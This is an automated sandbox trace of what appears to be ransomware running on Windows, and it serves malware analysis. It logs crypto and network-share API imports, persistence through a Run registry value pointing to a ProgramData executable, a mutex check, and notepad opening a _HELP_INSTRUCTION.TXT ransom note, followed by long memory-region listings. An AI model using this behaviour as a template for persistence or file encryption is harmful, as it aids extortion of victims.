[0094.100] GetProcAddress (hModule=0x75ce0000, lpProcName="lstrcmpW") returned 0x75cf5929 [0094.100] GetProcAddress (hModule=0x75ce0000, lpProcName="GlobalAlloc") returned 0x75cf588e [0094.101] GetProcAddress (hModule=0x75ce0000, lpProcName="GetLogicalDriveStringsW") returned 0x75d7436f [0094.101] GetProcAddress (hModule=0x75ce0000, lpProcName="GetProcAddress") returned 0x75cf1222 [0094.101] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x764b0000 [0094.101] GetProcAddress (hModule=0x764b0000, lpProcName="SetTimer") returned 0x764c79fb [0094.102] GetProcAddress (hModule=0x764b0000, lpProcName="AppendMenuA") returned 0x765267fb [0094.102] GetProcAddress (hModule=0x764b0000, lpProcName="SetActiveWindow") returned 0x764d3208 [0094.102] GetProcAddress (hModule=0x764b0000, lpProcName="GetForegroundWindow") returned 0x764d2320 [0094.103] GetProcAddress (hModule=0x764b0000, lpProcName="SetForegroundWindow") returned 0x764ef170 [0094.103] GetProcAddress (hModule=0x764b0000, lpProcName="SetWindowTextA") returned 0x764d7aee [0094.103] GetProcAddress (hModule=0x764b0000, lpProcName="CharUpperW") returned 0x764cf350 [0094.103] GetProcAddress (hModule=0x764b0000, lpProcName="MessageBoxW") returned 0x7651fd3f [0094.103] GetProcAddress (hModule=0x764b0000, lpProcName="LoadAcceleratorsW") returned 0x764d4dd6 [0094.104] GetProcAddress (hModule=0x764b0000, lpProcName="LoadMenuW") returned 0x764d4391 [0094.104] GetProcAddress (hModule=0x764b0000, lpProcName="CloseClipboard") returned 0x764d8e8d [0094.104] GetProcAddress (hModule=0x764b0000, lpProcName="EnableMenuItem") returned 0x764d6f50 [0094.104] GetProcAddress (hModule=0x764b0000, lpProcName="CharNextW") returned 0x764c8151 [0094.105] GetProcAddress (hModule=0x764b0000, lpProcName="CharNextA") returned 0x764c7a1b [0094.105] GetProcAddress (hModule=0x764b0000, lpProcName="CharLowerW") returned 0x764c7647 [0094.105] GetProcAddress (hModule=0x764b0000, lpProcName="GetClipboardData") returned 0x76509f1d [0094.105] GetProcAddress (hModule=0x764b0000, lpProcName="MessageBeep") returned 0x764dc036 [0094.106] GetProcAddress (hModule=0x764b0000, lpProcName="GetParent") returned 0x764d0f68 [0094.106] GetProcAddress (hModule=0x764b0000, lpProcName="SetWinEventHook") returned 0x764cee09 [0094.106] GetProcAddress (hModule=0x764b0000, lpProcName="wsprintfW") returned 0x764ee061 [0094.106] GetProcAddress (hModule=0x764b0000, lpProcName="GetMenuItemCount") returned 0x764d563b [0094.107] GetProcAddress (hModule=0x764b0000, lpProcName="IsDlgButtonChecked") returned 0x764ec0a6 [0094.107] GetProcAddress (hModule=0x764b0000, lpProcName="CheckDlgButton") returned 0x764ebe9a [0094.107] GetProcAddress (hModule=0x764b0000, lpProcName="SetDlgItemTextW") returned 0x764ecfa0 [0094.107] GetProcAddress (hModule=0x764b0000, lpProcName="GetDlgItem") returned 0x764ef1ba [0094.108] GetProcAddress (hModule=0x764b0000, lpProcName="MoveWindow") returned 0x764d3698 [0094.108] GetProcAddress (hModule=0x764b0000, lpProcName="CreateWindowExA") returned 0x764cd22e [0094.109] GetProcAddress (hModule=0x764b0000, lpProcName="CallWindowProcW") returned 0x764d0d32 [0094.109] GetProcAddress (hModule=0x764b0000, lpProcName="TranslateMessage") returned 0x764c7809 [0094.109] GetProcAddress (hModule=0x764b0000, lpProcName="GetMessageW") returned 0x764c78e2 [0094.109] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75c50000 [0094.110] GetProcAddress (hModule=0x75c50000, lpProcName="SetTextColor") returned 0x75c6522d [0094.110] GetProcAddress (hModule=0x75c50000, lpProcName="CreateCompatibleBitmap") returned 0x75c65f49 [0094.110] GetProcAddress (hModule=0x75c50000, lpProcName="EndDoc") returned 0x75c93f29 [0094.110] GetProcAddress (hModule=0x75c50000, lpProcName="SetAbortProc") returned 0x75c76b89 [0094.111] GetProcAddress (hModule=0x75c50000, lpProcName="CreateFontIndirectW") returned 0x75c65c19 [0094.111] GetProcAddress (hModule=0x75c50000, lpProcName="CreateFontA") returned 0x75c6d0e8 [0094.111] GetProcAddress (hModule=0x75c50000, lpProcName="TextOutW") returned 0x75c6d41c [0094.111] LoadLibraryA (lpLibFileName="WINSPOOL.DRV") returned 0x746f0000 [0094.115] GetProcAddress (hModule=0x746f0000, lpProcName="OpenPrinterW") returned 0x746f68f0 [0094.115] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x74b90000 [0094.123] GetProcAddress (hModule=0x74b90000, lpProcName="GetSaveFileNameW") returned 0x74bca36e [0094.139] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x75960000 [0094.139] GetProcAddress (hModule=0x75960000, lpProcName="CryptDestroyKey") returned 0x7596c51a [0094.139] GetProcAddress (hModule=0x75960000, lpProcName="CryptAcquireContextW") returned 0x7596df14 [0094.140] GetProcAddress (hModule=0x75960000, lpProcName="CryptExportKey") returned 0x759691ea [0094.140] GetProcAddress (hModule=0x75960000, lpProcName="OpenProcessToken") returned 0x75974304 [0094.140] GetProcAddress (hModule=0x75960000, lpProcName="GetTokenInformation") returned 0x7597431c [0094.140] GetProcAddress (hModule=0x75960000, lpProcName="GetUserNameW") returned 0x7597157a [0094.140] GetProcAddress (hModule=0x75960000, lpProcName="RegCloseKey") returned 0x7597469d [0094.141] GetProcAddress (hModule=0x75960000, lpProcName="RegCreateKeyW") returned 0x75971514 [0094.141] GetProcAddress (hModule=0x75960000, lpProcName="RegFlushKey") returned 0x7598773f [0094.141] GetProcAddress (hModule=0x75960000, lpProcName="RegOpenKeyW") returned 0x75972459 [0094.141] GetProcAddress (hModule=0x75960000, lpProcName="RegQueryValueExW") returned 0x759746ad [0094.142] GetProcAddress (hModule=0x75960000, lpProcName="RegSetValueExW") returned 0x759714d6 [0094.142] GetProcAddress (hModule=0x75960000, lpProcName="RegOpenKeyExA") returned 0x75974907 [0094.142] GetProcAddress (hModule=0x75960000, lpProcName="RegQueryValueExA") returned 0x759748ef [0094.142] GetProcAddress (hModule=0x75960000, lpProcName="ControlService") returned 0x75987144 [0094.143] GetProcAddress (hModule=0x75960000, lpProcName="QueryServiceStatus") returned 0x75972a86 [0094.143] GetProcAddress (hModule=0x75960000, lpProcName="StartServiceA") returned 0x759a3543 [0094.143] GetProcAddress (hModule=0x75960000, lpProcName="CryptGenKey") returned 0x75968ee9 [0094.143] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x74cb0000 [0094.144] GetProcAddress (hModule=0x74cb0000, lpProcName="ShellExecuteW") returned 0x74cc3c71 [0094.144] GetProcAddress (hModule=0x74cb0000, lpProcName="DragFinish") returned 0x74ec4e4a [0094.144] GetProcAddress (hModule=0x74cb0000, lpProcName="ShellExecuteExW") returned 0x74cd1e46 [0094.145] GetProcAddress (hModule=0x74cb0000, lpProcName="SHGetSpecialFolderPathW") returned 0x74cd0468 [0094.145] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76350000 [0094.145] GetProcAddress (hModule=0x76350000, lpProcName="CoCreateGuid") returned 0x763915d5 [0094.145] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x75df0000 [0094.146] GetProcAddress (hModule=0x75df0000, lpProcName="PathFindFileNameW") returned 0x75e0bb71 [0094.146] GetProcAddress (hModule=0x75df0000, lpProcName="StrStrA") returned 0x75e1c45b [0094.146] GetProcAddress (hModule=0x75df0000, lpProcName="StrStrW") returned 0x75dfe52d [0094.146] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x75ef0000 [0094.152] GetProcAddress (hModule=0x75ef0000, lpProcName="CryptImportPublicKeyInfo") returned 0x75f06c0e [0094.152] GetProcAddress (hModule=0x75ef0000, lpProcName="CryptDecodeObjectEx") returned 0x75efd718 [0094.152] GetProcAddress (hModule=0x75ef0000, lpProcName="CryptStringToBinaryA") returned 0x75f25d77 [0094.152] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x767d0000 [0094.153] GetProcAddress (hModule=0x767d0000, lpProcName="UuidToStringW") returned 0x76811ee5 [0094.153] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x746d0000 [0094.156] GetProcAddress (hModule=0x746d0000, lpProcName="WNetCloseEnum") returned 0x746d2dd6 [0094.157] GetProcAddress (hModule=0x746d0000, lpProcName="WNetEnumResourceW") returned 0x746d3058 [0094.157] GetProcAddress (hModule=0x746d0000, lpProcName="WNetOpenEnumW") returned 0x746d2f06 [0094.157] VirtualProtect (in: lpAddress=0x55820000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x1815dc | out: lpflOldProtect=0x1815dc*=0x40) returned 1 [0094.157] VirtualProtect (in: lpAddress=0x55821000, dwSize=0x405e, flNewProtect=0x20, lpflOldProtect=0x1815dc | out: lpflOldProtect=0x1815dc*=0x40) returned 1 [0094.157] VirtualProtect (in: lpAddress=0x55826000, dwSize=0x19b6, flNewProtect=0x2, lpflOldProtect=0x1815dc | out: lpflOldProtect=0x1815dc*=0x40) returned 1 [0094.157] VirtualProtect (in: lpAddress=0x55828000, dwSize=0x3c2c, flNewProtect=0x4, lpflOldProtect=0x1815dc | out: lpflOldProtect=0x1815dc*=0x40) returned 1 [0094.157] VirtualProtect (in: lpAddress=0x5582c000, dwSize=0x4, flNewProtect=0x2, lpflOldProtect=0x1815dc | out: lpflOldProtect=0x1815dc*=0x40) returned 1 [0094.157] VirtualProtect (in: lpAddress=0x5582d000, dwSize=0x1e0, flNewProtect=0x2, lpflOldProtect=0x1815dc | out: lpflOldProtect=0x1815dc*=0x40) returned 1 [0094.157] VirtualProtect (in: lpAddress=0x5582e000, dwSize=0x934, flNewProtect=0x2, lpflOldProtect=0x1815dc | out: lpflOldProtect=0x1815dc*=0x40) returned 1 [0094.185] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x180760, nSize=0x104 | out: lpFilename="C:\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe")) returned 0x1d [0094.185] wsprintfW (in: param_1=0x180968, param_2="\"%s\"" | out: param_1="\"C:\\ProgramData\\BCE1010314.exe\"") returned 31 [0094.185] GetUserNameW (in: lpBuffer=0x180558, pcbBuffer=0x180348 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x180348) returned 1 [0094.186] wsprintfW (in: param_1=0x180350, param_2="00FF%08X" | out: param_1="00FFE1010314") returned 12 [0094.186] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", phkResult=0x18034c | out: phkResult=0x18034c*=0x288) returned 0x0 [0094.186] RegSetValueExW (in: hKey=0x288, lpValueName="00FFE1010314", Reserved=0x0, dwType=0x1, lpData="\"C:\\ProgramData\\BCE1010314.exe\"", cbData=0x3e | out: lpData="\"C:\\ProgramData\\BCE1010314.exe\"") returned 0x0 [0094.186] RegFlushKey (hKey=0x288) returned 0x0 [0094.190] RegCloseKey (hKey=0x288) returned 0x0 [0094.190] GetUserNameW (in: lpBuffer=0x180968, pcbBuffer=0x180758 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x180758) returned 1 [0094.190] wsprintfW (in: param_1=0x180760, param_2="BC%08X" | out: param_1="BCE1010314") returned 10 [0094.190] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", phkResult=0x18075c | out: phkResult=0x18075c*=0x288) returned 0x0 [0094.190] RegQueryValueExW (in: hKey=0x288, lpValueName="BCE1010314", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0094.190] Sleep (dwMilliseconds=0x1388) [0099.644] OutputDebugStringA (lpOutputString="-") [0099.644] GetUserNameW (in: lpBuffer=0x180da4, pcbBuffer=0x180b88 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x180b88) returned 1 [0099.645] wsprintfW (in: param_1=0x180b9c, param_2="%08X_offset" | out: param_1="E1010314_offset") returned 15 [0099.645] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="E1010314_offset") returned 0x28c [0099.645] WaitForSingleObject (hHandle=0x28c, dwMilliseconds=0x0) returned 0x102 [0099.645] CloseHandle (hObject=0x28c) returned 1 [0099.645] ExitProcess (uExitCode=0x0) Thread: id = 207 os_tid = 0x608 Thread: id = 210 os_tid = 0x62c Thread: id = 214 os_tid = 0x658 Thread: id = 215 os_tid = 0x65c Thread: id = 220 os_tid = 0x694 Thread: id = 223 os_tid = 0x6b0 Thread: id = 226 os_tid = 0x6c8 Thread: id = 229 os_tid = 0x6e0 Thread: id = 232 os_tid = 0x700 Thread: id = 235 os_tid = 0x714 Thread: id = 237 os_tid = 0x71c Thread: id = 240 os_tid = 0x72c Thread: id = 243 os_tid = 0x738 Thread: id = 246 os_tid = 0x754 Thread: id = 249 os_tid = 0x764 Thread: id = 252 os_tid = 0x778 Thread: id = 255 os_tid = 0x784 Process: id = "25" image_name = "notepad.exe" filename = "c:\\windows\\syswow64\\notepad.exe" page_root = "0x8871000" os_pid = "0x1030" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "23" os_parent_pid = "0x54c" cmd_line = "\"C:\\Windows\\system32\\NOTEPAD.EXE\" C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_HELP_INSTRUCTION.TXT" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e620" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3417 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3418 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3419 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3420 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3421 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 3422 start_va = 0x230000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 3423 start_va = 0x2a0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 3424 start_va = 0xe10000 end_va = 0xe3ffff entry_point = 0xe10000 region_type = mapped_file name = "notepad.exe" filename = "\\Windows\\SysWOW64\\notepad.exe" (normalized: "c:\\windows\\syswow64\\notepad.exe") Region: id = 3425 start_va = 0x76cc0000 end_va = 0x76e68fff entry_point = 0x76cc0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3426 start_va = 0x76ea0000 end_va = 0x7701ffff entry_point = 0x76ea0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3427 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 3428 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 3429 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 3430 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 3431 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3432 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3433 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3434 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 3435 start_va = 0x73410000 end_va = 0x73417fff entry_point = 0x734120f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3436 start_va = 0x73420000 end_va = 0x7347bfff entry_point = 0x7345f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3437 start_va = 0x73480000 end_va = 0x734befff entry_point = 0x734ade78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3438 start_va = 0x76aa0000 end_va = 0x76bbefff entry_point = 0x0 region_type = private name = "private_0x0000000076aa0000" filename = "" Region: id = 3439 start_va = 0x76bc0000 end_va = 0x76cb9fff entry_point = 0x0 region_type = private name = "private_0x0000000076bc0000" filename = "" Region: id = 3440 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3441 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3442 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3443 start_va = 0x660000 end_va = 0x66ffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 3444 start_va = 0x73270000 end_va = 0x7340dfff entry_point = 0x7329e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 3445 start_va = 0x746f0000 end_va = 0x74740fff entry_point = 0x7471988c region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 3446 start_va = 0x74870000 end_va = 0x74878fff entry_point = 0x74870000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 3447 start_va = 0x749f0000 end_va = 0x749fbfff entry_point = 0x749f10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3448 start_va = 0x74a00000 end_va = 0x74a5ffff entry_point = 0x74a1a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3449 start_va = 0x74ad0000 end_va = 0x74b5efff entry_point = 0x74ad3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3450 start_va = 0x74b90000 end_va = 0x74c0afff entry_point = 0x74b91aee region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 3451 start_va = 0x74c40000 end_va = 0x74c85fff entry_point = 0x74c47478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3452 start_va = 0x74cb0000 end_va = 0x758f9fff entry_point = 0x74d31601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 3453 start_va = 0x75960000 end_va = 0x759fffff entry_point = 0x759749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3454 start_va = 0x75c50000 end_va = 0x75cdffff entry_point = 0x75c66343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3455 start_va = 0x75ce0000 end_va = 0x75deffff entry_point = 0x75cf32d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3456 start_va = 0x75df0000 end_va = 0x75e46fff entry_point = 0x75e09ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3457 start_va = 0x75e50000 end_va = 0x75eecfff entry_point = 0x75e83fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 3458 start_va = 0x76280000 end_va = 0x7632bfff entry_point = 0x7628a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3459 start_va = 0x76330000 end_va = 0x76348fff entry_point = 0x76334975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3460 start_va = 0x76350000 end_va = 0x764abfff entry_point = 0x7639ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3461 start_va = 0x764b0000 end_va = 0x765affff entry_point = 0x764cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3462 start_va = 0x767c0000 end_va = 0x767c9fff entry_point = 0x767c36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 3463 start_va = 0x767d0000 end_va = 0x768bffff entry_point = 0x767e0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3464 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3465 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3466 start_va = 0x670000 end_va = 0x7f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 3467 start_va = 0x74a60000 end_va = 0x74abffff entry_point = 0x74a7158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3468 start_va = 0x766f0000 end_va = 0x767bbfff entry_point = 0x766f168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3469 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3470 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3471 start_va = 0xe0000 end_va = 0xe2fff entry_point = 0xe0000 region_type = mapped_file name = "notepad.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\notepad.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\notepad.exe.mui") Region: id = 3472 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 3473 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 3474 start_va = 0x120000 end_va = 0x121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 3475 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 3476 start_va = 0x800000 end_va = 0x980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 3477 start_va = 0xb70000 end_va = 0xbaffff entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 3478 start_va = 0xe40000 end_va = 0x223ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e40000" filename = "" Region: id = 3479 start_va = 0x731f0000 end_va = 0x7326ffff entry_point = 0x732037c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3480 start_va = 0x500000 end_va = 0x5defff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 3481 start_va = 0x74850000 end_va = 0x74862fff entry_point = 0x74850000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3482 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 3483 start_va = 0x130000 end_va = 0x130fff entry_point = 0x130000 region_type = mapped_file name = "msctf.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\msctf.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\msctf.dll.mui") Region: id = 3484 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 3485 start_va = 0x2e0000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 3486 start_va = 0xaa0000 end_va = 0xadffff entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 3487 start_va = 0x2240000 end_va = 0x2b6ffff entry_point = 0x2240000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 3488 start_va = 0x2b70000 end_va = 0x2f62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b70000" filename = "" Region: id = 3489 start_va = 0x2f70000 end_va = 0x323efff entry_point = 0x2f70000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3490 start_va = 0x75a90000 end_va = 0x75b12fff entry_point = 0x75a923d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Thread: id = 854 os_tid = 0x1034